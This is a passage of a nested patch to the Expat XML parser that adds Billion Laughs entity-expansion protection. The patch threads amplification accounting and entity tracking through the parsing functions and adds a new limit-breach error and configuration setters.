++ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT;
++
++ memset(&parser->m_entity_stats, 0, sizeof(ENTITY_STATS));
++ parser->m_entity_stats.debugLevel = getDebugLevel("EXPAT_ENTITY_DEBUG", 0u);
++#endif
+ }
+
+ /* moves list of bindings to m_freeBindingList */
+@@ -2318,6 +2396,10 @@ XML_ErrorString(enum XML_Error code) {
+ /* Added in 2.2.5. */
+ case XML_ERROR_INVALID_ARGUMENT: /* Constant added in 2.2.1, already */
+ return XML_L("invalid argument");
++ /* Added in 2.4.0. */
++ case XML_ERROR_AMPLIFICATION_LIMIT_BREACH:
++ return XML_L(
++ "limit on input amplification factor (from DTD and entities) breached");
+ }
+ return NULL;
+ }
+@@ -2354,41 +2436,75 @@ XML_ExpatVersionInfo(void) {
+
+ const XML_Feature *XMLCALL
+ XML_GetFeatureList(void) {
+- static const XML_Feature features[]
+- = {{XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
+- sizeof(XML_Char)},
+- {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
+- sizeof(XML_LChar)},
++ static const XML_Feature features[] = {
++ {XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
++ sizeof(XML_Char)},
++ {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
++ sizeof(XML_LChar)},
+ #ifdef XML_UNICODE
+- {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
++ {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
+ #endif
+ #ifdef XML_UNICODE_WCHAR_T
+- {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
++ {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
+ #endif
+ #ifdef XML_DTD
+- {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
++ {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
+ #endif
+ #ifdef XML_CONTEXT_BYTES
+- {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
+- XML_CONTEXT_BYTES},
++ {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
++ XML_CONTEXT_BYTES},
+ #endif
+ #ifdef XML_MIN_SIZE
+- {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
++ {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
+ #endif
+ #ifdef XML_NS
+- {XML_FEATURE_NS, XML_L("XML_NS"), 0},
++ {XML_FEATURE_NS, XML_L("XML_NS"), 0},
+ #endif
+ #ifdef XML_LARGE_SIZE
+- {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
++ {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
+ #endif
+ #ifdef XML_ATTR_INFO
+- {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
++ {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
+ #endif
+- {XML_FEATURE_END, NULL, 0}};
++#ifdef XML_DTD
++ /* Added in Expat 2.4.0. */
++ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
++ XML_L("XML_BLAP_MAX_AMP"),
++ (long int)
++ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT},
++ {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT,
++ XML_L("XML_BLAP_ACT_THRES"),
++ EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT},
++#endif
++ {XML_FEATURE_END, NULL, 0}};
+
+ return features;
+ }
+
++#ifdef XML_DTD
++XML_Bool XMLCALL
++XML_SetBillionLaughsAttackProtectionMaximumAmplification(
++ XML_Parser parser, float maximumAmplificationFactor) {
++ if ((parser == NULL) || (parser->m_parentParser != NULL)
++ || isnan(maximumAmplificationFactor)
++ || (maximumAmplificationFactor < 1.0f)) {
++ return XML_FALSE;
++ }
++ parser->m_accounting.maximumAmplificationFactor = maximumAmplificationFactor;
++ return XML_TRUE;
++}
++
++XML_Bool XMLCALL
++XML_SetBillionLaughsAttackProtectionActivationThreshold(
++ XML_Parser parser, unsigned long long activationThresholdBytes) {
++ if ((parser == NULL) || (parser->m_parentParser != NULL)) {
++ return XML_FALSE;
++ }
++ parser->m_accounting.activationThresholdBytes = activationThresholdBytes;
++ return XML_TRUE;
++}
++#endif /* XML_DTD */
++
+ /* Initially tag->rawName always points into the parse buffer;
+ for those TAG instances opened while the current parse buffer was
+ processed, and not yet closed, we need to store tag->rawName in a more
+@@ -2441,9 +2557,9 @@ storeRawNames(XML_Parser parser) {
+ static enum XML_Error PTRCALL
+ contentProcessor(XML_Parser parser, const char *start, const char *end,
+ const char **endPtr) {
+- enum XML_Error result
+- = doContent(parser, 0, parser->m_encoding, start, end, endPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ enum XML_Error result = doContent(
++ parser, 0, parser->m_encoding, start, end, endPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
+ if (result == XML_ERROR_NONE) {
+ if (! storeRawNames(parser))
+ return XML_ERROR_NO_MEMORY;
+@@ -2468,6 +2584,14 @@ externalEntityInitProcessor2(XML_Parser parser, const char *start,
+ int tok = XmlContentTok(parser->m_encoding, start, end, &next);
+ switch (tok) {
+ case XML_TOK_BOM:
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, start, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif /* XML_DTD */
++
+ /* If we are at the end of the buffer, this would cause the next stage,
+ i.e. externalEntityInitProcessor3, to pass control directly to
+ doContent (by detecting XML_TOK_NONE) without processing any xml text
+@@ -2505,6 +2629,10 @@ externalEntityInitProcessor3(XML_Parser parser, const char *start,
+ const char *next = start; /* XmlContentTok doesn't always set the last arg */
+ parser->m_eventPtr = start;
+ tok = XmlContentTok(parser->m_encoding, start, end, &next);
++ /* Note: These bytes are accounted later in:
++ - processXmlDecl
++ - externalEntityContentProcessor
++ */
+ parser->m_eventEndPtr = next;
+
+ switch (tok) {
+@@ -2546,7 +2674,8 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
+ const char *end, const char **endPtr) {
+ enum XML_Error result
+ = doContent(parser, 1, parser->m_encoding, start, end, endPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+ if (result == XML_ERROR_NONE) {
+ if (! storeRawNames(parser))
+ return XML_ERROR_NO_MEMORY;
+@@ -2557,7 +2686,7 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
+ static enum XML_Error
+ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ const char *s, const char *end, const char **nextPtr,
+- XML_Bool haveMore) {
++ XML_Bool haveMore, enum XML_Account account) {
+ /* save one level of indirection */
+ DTD *const dtd = parser->m_dtd;
+
+@@ -2575,6 +2704,17 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ for (;;) {
+ const char *next = s; /* XmlContentTok doesn't always set the last arg */
+ int tok = XmlContentTok(enc, s, end, &next);
++#ifdef XML_DTD
++ const char *accountAfter
++ = ((tok == XML_TOK_TRAILING_RSQB) || (tok == XML_TOK_TRAILING_CR))
++ ? (haveMore ? s /* i.e. 0 bytes */ : end)
++ : next;
++ if (! accountingDiffTolerated(parser, tok, s, accountAfter, __LINE__,
++ account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
+ *eventEndPP = next;
+ switch (tok) {
+ case XML_TOK_TRAILING_CR:
+@@ -2630,6 +2770,14 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ XML_Char ch = (XML_Char)XmlPredefinedEntityName(
+ enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
+ if (ch) {
++#ifdef XML_DTD
++ /* NOTE: We are replacing 4-6 characters original input for 1 character
++ * so there is no amplification and hence recording without
++ * protection. */
++ accountingDiffTolerated(parser, tok, (char *)&ch,
++ ((char *)&ch) + sizeof(XML_Char), __LINE__,
++ XML_ACCOUNT_ENTITY_EXPANSION);
++#endif /* XML_DTD */
+ if (parser->m_characterDataHandler)
+ parser->m_characterDataHandler(parser->m_handlerArg, &ch, 1);
+ else if (parser->m_defaultHandler)
+@@ -2748,7 +2896,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ }
+ tag->name.str = (XML_Char *)tag->buf;
+ *toPtr = XML_T('\0');
+- result = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings));
++ result
++ = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings), account);
+ if (result)
+ return result;
+ if (parser->m_startElementHandler)
+@@ -2772,7 +2921,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ if (! name.str)
+ return XML_ERROR_NO_MEMORY;
+ poolFinish(&parser->m_tempPool);
+- result = storeAtts(parser, enc, s, &name, &bindings);
++ result = storeAtts(parser, enc, s, &name, &bindings,
++ XML_ACCOUNT_NONE /* token spans whole start tag */);
+ if (result != XML_ERROR_NONE) {
+ freeBindings(parser, bindings);
+ return result;
+@@ -2907,7 +3057,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+ /* END disabled code */
+ else if (parser->m_defaultHandler)
+ reportDefault(parser, enc, s, next);
+- result = doCdataSection(parser, enc, &next, end, nextPtr, haveMore);
++ result
++ = doCdataSection(parser, enc, &next, end, nextPtr, haveMore, account);
+ if (result != XML_ERROR_NONE)
+ return result;
+ else if (! next) {
+@@ -3036,7 +3187,8 @@ freeBindings(XML_Parser parser, BINDING *bindings) {
+ */
+ static enum XML_Error
+ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+- TAG_NAME *tagNamePtr, BINDING **bindingsPtr) {
++ TAG_NAME *tagNamePtr, BINDING **bindingsPtr,
++ enum XML_Account account) {
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+ ELEMENT_TYPE *elementType;
+ int nDefaultAtts;
+@@ -3146,7 +3298,7 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ /* normalize the attribute value */
+ result = storeAttributeValue(
+ parser, enc, isCdata, parser->m_atts[i].valuePtr,
+- parser->m_atts[i].valueEnd, &parser->m_tempPool);
++ parser->m_atts[i].valueEnd, &parser->m_tempPool, account);
+ if (result)
+ return result;
+ appAtts[attIndex] = poolStart(&parser->m_tempPool);
+@@ -3535,9 +3687,9 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ static enum XML_Error PTRCALL
+ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
+ const char **endPtr) {
+- enum XML_Error result
+- = doCdataSection(parser, parser->m_encoding, &start, end, endPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ enum XML_Error result = doCdataSection(
++ parser, parser->m_encoding, &start, end, endPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
+ if (result != XML_ERROR_NONE)
+ return result;
+ if (start) {
+@@ -3557,7 +3709,8 @@ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
+ */
+ static enum XML_Error
+ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+- const char *end, const char **nextPtr, XML_Bool haveMore) {
++ const char *end, const char **nextPtr, XML_Bool haveMore,
++ enum XML_Account account) {
+ const char *s = *startPtr;
+ const char **eventPP;
+ const char **eventEndPP;
+@@ -3575,6 +3728,14 @@ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+ for (;;) {
+ const char *next;
+ int tok = XmlCdataSectionTok(enc, s, end, &next);
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#else
++ UNUSED_P(account);
++#endif
+ *eventEndPP = next;
+ switch (tok) {
+ case XML_TOK_CDATA_SECT_CLOSE:
+@@ -3719,6 +3880,13 @@ doIgnoreSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+ *eventPP = s;
+ *startPtr = NULL;
+ tok = XmlIgnoreSectionTok(enc, s, end, &next);
++# ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++# endif
+ *eventEndPP = next;
+ switch (tok) {
+ case XML_TOK_IGNORE_SECT:
+@@ -3803,6 +3971,15 @@ processXmlDecl(XML_Parser parser, int isGeneralTextEntity, const char *s,
+ const char *versionend;
+ const XML_Char *storedversion = NULL;
+ int standalone = -1;
++
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, XML_TOK_XML_DECL, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
++
+ if (! (parser->m_ns ? XmlParseXmlDeclNS : XmlParseXmlDecl)(
+ isGeneralTextEntity, parser->m_encoding, s, next, &parser->m_eventPtr,
+ &version, &versionend, &encodingName, &newEncoding, &standalone)) {
+@@ -3952,6 +4129,10 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+
+ for (;;) {
+ tok = XmlPrologTok(parser->m_encoding, start, end, &next);
++ /* Note: Except for XML_TOK_BOM below, these bytes are accounted later in:
++ - storeEntityValue
++ - processXmlDecl
++ */
+ parser->m_eventEndPtr = next;
+ if (tok <= 0) {
+ if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
+@@ -3970,7 +4151,8 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+ break;
+ }
+ /* found end of entity value - can store it now */
+- return storeEntityValue(parser, parser->m_encoding, s, end);
++ return storeEntityValue(parser, parser->m_encoding, s, end,
++ XML_ACCOUNT_DIRECT);
+ } else if (tok == XML_TOK_XML_DECL) {
+ enum XML_Error result;
+ result = processXmlDecl(parser, 0, start, next);
+@@ -3997,6 +4179,14 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+ */
+ else if (tok == XML_TOK_BOM && next == end
+ && ! parser->m_parsingStatus.finalBuffer) {
++# ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++# endif
++
+ *nextPtr = next;
+ return XML_ERROR_NONE;
+ }
+@@ -4039,16 +4229,24 @@ externalParEntProcessor(XML_Parser parser, const char *s, const char *end,
+ }
+ /* This would cause the next stage, i.e. doProlog to be passed XML_TOK_BOM.
+ However, when parsing an external subset, doProlog will not accept a BOM
+- as valid, and report a syntax error, so we have to skip the BOM
++ as valid, and report a syntax error, so we have to skip the BOM, and
++ account for the BOM bytes.
+ */
+ else if (tok == XML_TOK_BOM) {
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++
+ s = next;
+ tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+ }
+
+ parser->m_processor = prologProcessor;
+ return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++ XML_ACCOUNT_DIRECT);
+ }
+
+ static enum XML_Error PTRCALL
+@@ -4061,6 +4259,9 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
+
+ for (;;) {
+ tok = XmlPrologTok(enc, start, end, &next);
++ /* Note: These bytes are accounted later in:
++ - storeEntityValue
++ */
+ if (tok <= 0) {
+ if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
+ *nextPtr = s;
+@@ -4078,7 +4279,7 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
+ break;
+ }
+ /* found end of entity value - can store it now */
+- return storeEntityValue(parser, enc, s, end);
++ return storeEntityValue(parser, enc, s, end, XML_ACCOUNT_DIRECT);
+ }
+ start = next;
+ }
+@@ -4092,13 +4293,14 @@ prologProcessor(XML_Parser parser, const char *s, const char *end,
+ const char *next = s;
+ int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+ return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++ XML_ACCOUNT_DIRECT);
+ }
+
+ static enum XML_Error
+ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ int tok, const char *next, const char **nextPtr, XML_Bool haveMore,
+- XML_Bool allowClosingDoctype) {
++ XML_Bool allowClosingDoctype, enum XML_Account account) {
+ #ifdef XML_DTD
+ static const XML_Char externalSubsetName[] = {ASCII_HASH, '\0'};
+ #endif /* XML_DTD */
+@@ -4125,6 +4327,10 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ static const XML_Char enumValueSep[] = {ASCII_PIPE, '\0'};
+ static const XML_Char enumValueStart[] = {ASCII_LPAREN, '\0'};
+
++#ifndef XML_DTD
++ UNUSED_P(account);
++#endif
++
+ /* save one level of indirection */
+ DTD *const dtd = parser->m_dtd;
+
+@@ -4189,6 +4395,19 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ }
+ }
+ role = XmlTokenRole(&parser->m_prologState, tok, s, next, enc);
++#ifdef XML_DTD
++ switch (role) {
++ case XML_ROLE_INSTANCE_START: // bytes accounted in contentProcessor
++ case XML_ROLE_XML_DECL: // bytes accounted in processXmlDecl
++ case XML_ROLE_TEXT_DECL: // bytes accounted in processXmlDecl
++ break;
++ default:
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++ }
++#endif
+ switch (role) {
+ case XML_ROLE_XML_DECL: {
+ enum XML_Error result = processXmlDecl(parser, 0, s, next);
+@@ -4464,7 +4683,8 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ const XML_Char *attVal;
+ enum XML_Error result = storeAttributeValue(
+ parser, enc, parser->m_declAttributeIsCdata,
+- s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool);
++ s + enc->minBytesPerChar, next - enc->minBytesPerChar, &dtd->pool,
++ XML_ACCOUNT_NONE);
+ if (result)
+ return result;
+ attVal = poolStart(&dtd->pool);
+@@ -4497,8 +4717,9 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ break;
+ case XML_ROLE_ENTITY_VALUE:
+ if (dtd->keepProcessing) {
+- enum XML_Error result = storeEntityValue(
+- parser, enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
++ enum XML_Error result
++ = storeEntityValue(parser, enc, s + enc->minBytesPerChar,
++ next - enc->minBytesPerChar, XML_ACCOUNT_NONE);
+ if (parser->m_declEntity) {
+ parser->m_declEntity->textPtr = poolStart(&dtd->entityValuePool);
+ parser->m_declEntity->textLen
+@@ -4888,12 +5109,15 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (parser->m_externalEntityRefHandler) {
+ dtd->paramEntityRead = XML_FALSE;
+ entity->open = XML_TRUE;
++ entityTrackingOnOpen(parser, entity, __LINE__);
+ if (! parser->m_externalEntityRefHandler(
+ parser->m_externalEntityRefHandlerArg, 0, entity->base,
+ entity->systemId, entity->publicId)) {
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ return XML_ERROR_EXTERNAL_ENTITY_HANDLING;
+ }
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ handleDefault = XML_FALSE;
+ if (! dtd->paramEntityRead) {
+@@ -5091,6 +5315,13 @@ epilogProcessor(XML_Parser parser, const char *s, const char *end,
+ for (;;) {
+ const char *next = NULL;
+ int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++ XML_ACCOUNT_DIRECT)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
+ parser->m_eventEndPtr = next;
+ switch (tok) {
+ /* report partial linebreak - it might be the last token */
+@@ -5164,6 +5395,9 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
+ return XML_ERROR_NO_MEMORY;
+ }
+ entity->open = XML_TRUE;
++#ifdef XML_DTD
++ entityTrackingOnOpen(parser, entity, __LINE__);
++#endif
+ entity->processed = 0;
+ openEntity->next = parser->m_openInternalEntities;
+ parser->m_openInternalEntities = openEntity;
+@@ -5182,17 +5416,22 @@ processInternalEntity(XML_Parser parser, ENTITY *entity, XML_Bool betweenDecl) {
+ int tok
+ = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
+ result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
+- tok, next, &next, XML_FALSE, XML_FALSE);
++ tok, next, &next, XML_FALSE, XML_FALSE,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+ } else
+ #endif /* XML_DTD */
+ result = doContent(parser, parser->m_tagLevel, parser->m_internalEncoding,
+- textStart, textEnd, &next, XML_FALSE);
++ textStart, textEnd, &next, XML_FALSE,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+
+ if (result == XML_ERROR_NONE) {
+ if (textEnd != next && parser->m_parsingStatus.parsing == XML_SUSPENDED) {
+ entity->processed = (int)(next - textStart);
+ parser->m_processor = internalEntityProcessor;
+ } else {
++#ifdef XML_DTD
++ entityTrackingOnClose(parser, entity, __LINE__);
++#endif /* XML_DTD */
+ entity->open = XML_FALSE;
+ parser->m_openInternalEntities = openEntity->next;
+ /* put openEntity back in list of free instances */
+@@ -5225,12 +5464,13 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ int tok
+ = XmlPrologTok(parser->m_internalEncoding, textStart, textEnd, &next);
+ result = doProlog(parser, parser->m_internalEncoding, textStart, textEnd,
+- tok, next, &next, XML_FALSE, XML_TRUE);
++ tok, next, &next, XML_FALSE, XML_TRUE,
++ XML_ACCOUNT_ENTITY_EXPANSION);
+ } else
+ #endif /* XML_DTD */
+ result = doContent(parser, openEntity->startTagLevel,
+ parser->m_internalEncoding, textStart, textEnd, &next,
+- XML_FALSE);
++ XML_FALSE, XML_ACCOUNT_ENTITY_EXPANSION);
+
+ if (result != XML_ERROR_NONE)
+ return result;
+@@ -5239,6 +5479,9 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ entity->processed = (int)(next - (char *)entity->textPtr);
+ return result;
+ } else {
++#ifdef XML_DTD
++ entityTrackingOnClose(parser, entity, __LINE__);
++#endif
+ entity->open = XML_FALSE;
+ parser->m_openInternalEntities = openEntity->next;
+ /* put openEntity back in list of free instances */
+@@ -5252,7 +5495,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ parser->m_processor = prologProcessor;
+ tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+ return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++ XML_ACCOUNT_DIRECT);
+ } else
+ #endif /* XML_DTD */
+ {
+@@ -5260,7 +5504,8 @@ internalEntityProcessor(XML_Parser parser, const char *s, const char *end,
+ /* see externalEntityContentProcessor vs contentProcessor */
+ return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
+ s, end, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_DIRECT);
+ }
+ }
+
+@@ -5275,9 +5520,10 @@ errorProcessor(XML_Parser parser, const char *s, const char *end,
+
+ static enum XML_Error
+ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+- const char *ptr, const char *end, STRING_POOL *pool) {
++ const char *ptr, const char *end, STRING_POOL *pool,
++ enum XML_Account account) {
+ enum XML_Error result
+- = appendAttributeValue(parser, enc, isCdata, ptr, end, pool);
++ = appendAttributeValue(parser, enc, isCdata, ptr, end, pool, account);
+ if (result)
+ return result;
+ if (! isCdata && poolLength(pool) && poolLastChar(pool) == 0x20)
+@@ -5289,11 +5535,22 @@ storeAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+
+ static enum XML_Error
+ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+- const char *ptr, const char *end, STRING_POOL *pool) {
++ const char *ptr, const char *end, STRING_POOL *pool,
++ enum XML_Account account) {
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
++#ifndef XML_DTD
++ UNUSED_P(account);
++#endif
++
+ for (;;) {
+ const char *next;
+ int tok = XmlAttributeValueTok(enc, ptr, end, &next);
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, ptr, next, __LINE__, account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
+ switch (tok) {
+ case XML_TOK_NONE:
+ return XML_ERROR_NONE;
+@@ -5353,6 +5610,14 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+ XML_Char ch = (XML_Char)XmlPredefinedEntityName(
+ enc, ptr + enc->minBytesPerChar, next - enc->minBytesPerChar);
+ if (ch) {
++#ifdef XML_DTD
++ /* NOTE: We are replacing 4-6 characters original input for 1 character
++ * so there is no amplification and hence recording without
++ * protection. */
++ accountingDiffTolerated(parser, tok, (char *)&ch,
++ ((char *)&ch) + sizeof(XML_Char), __LINE__,
++ XML_ACCOUNT_ENTITY_EXPANSION);
++#endif /* XML_DTD */
+ if (! poolAppendChar(pool, ch))
+ return XML_ERROR_NO_MEMORY;
+ break;
+@@ -5430,9 +5695,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+ enum XML_Error result;
+ const XML_Char *textEnd = entity->textPtr + entity->textLen;
+ entity->open = XML_TRUE;
++#ifdef XML_DTD
++ entityTrackingOnOpen(parser, entity, __LINE__);
++#endif
+ result = appendAttributeValue(parser, parser->m_internalEncoding,
+- isCdata, (char *)entity->textPtr,
+- (char *)textEnd, pool);
++ isCdata, (const char *)entity->textPtr,
++ (const char *)textEnd, pool,
++ XML_ACCOUNT_ENTITY_EXPANSION);
++#ifdef XML_DTD
++ entityTrackingOnClose(parser, entity, __LINE__);
++#endif
+ entity->open = XML_FALSE;
+ if (result)
+ return result;
+@@ -5462,13 +5734,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+
+ static enum XML_Error
+ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+- const char *entityTextPtr, const char *entityTextEnd) {
++ const char *entityTextPtr, const char *entityTextEnd,
++ enum XML_Account account) {
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+ STRING_POOL *pool = &(dtd->entityValuePool);
+ enum XML_Error result = XML_ERROR_NONE;
+ #ifdef XML_DTD
+ int oldInEntityValue = parser->m_prologState.inEntityValue;
+ parser->m_prologState.inEntityValue = 1;
++#else
++ UNUSED_P(account);
+ #endif /* XML_DTD */
+ /* never return Null for the value argument in EntityDeclHandler,
+ since this would indicate an external entity; therefore we
+@@ -5481,6 +5756,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+ for (;;) {
+ const char *next;
+ int tok = XmlEntityValueTok(enc, entityTextPtr, entityTextEnd, &next);
++
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, entityTextPtr, next, __LINE__,
++ account)) {
++ accountingOnAbort(parser);
++ result = XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ goto endEntityValue;
++ }
++#endif
++
+ switch (tok) {
+ case XML_TOK_PARAM_ENTITY_REF:
+ #ifdef XML_DTD
+@@ -5516,13 +5801,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+ if (parser->m_externalEntityRefHandler) {
+ dtd->paramEntityRead = XML_FALSE;
+ entity->open = XML_TRUE;
++ entityTrackingOnOpen(parser, entity, __LINE__);
+ if (! parser->m_externalEntityRefHandler(
+ parser->m_externalEntityRefHandlerArg, 0, entity->base,
+ entity->systemId, entity->publicId)) {
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ result = XML_ERROR_EXTERNAL_ENTITY_HANDLING;
+ goto endEntityValue;
+ }
